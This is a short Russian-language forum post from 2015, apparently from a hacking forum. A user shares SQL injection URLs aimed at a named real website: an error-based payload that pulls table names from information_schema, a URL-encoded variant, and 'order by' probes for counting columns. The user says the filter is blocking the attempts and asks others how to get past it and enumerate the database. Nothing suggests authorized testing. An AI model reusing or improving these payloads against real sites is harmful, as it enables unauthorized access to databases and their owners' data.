22.06.2015, 20:22
|
|
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
Провел на форуме:
54593
Репутация:
0
|
|
Другой вектор:
Такой же сдвиг cms
Код:
http://www.kazanboats.ru/index.php?id=59"+(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
- пишет hek
Код:
http://www.kazanboats.ru/index.php?id=59%20+%281%29and%28+1+from%28+count%28*%29,concat%28%28+table_name+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--
Выбрасывает на страницу
Пробую замаркировать select при помощи concat - но не получается. Возможно, неправильно формирую запрос.
Сейчас пытаюсь просто найти кол-во таблиц - http://www.kazanboats.ru/index.php?id=59'+order+by+1000/* и http://www.kazanboats.ru/index.php?id=59'+order+by+1/*
Выдает одинаковый результат. Явно слепая иньекция.
Но если убрать кавычки или минус перед 59 - страница появляется.
Подскажи с самого простого, с поиска кол-ва таблиц.
Нужно шифровать запрос? order+by? |
|
|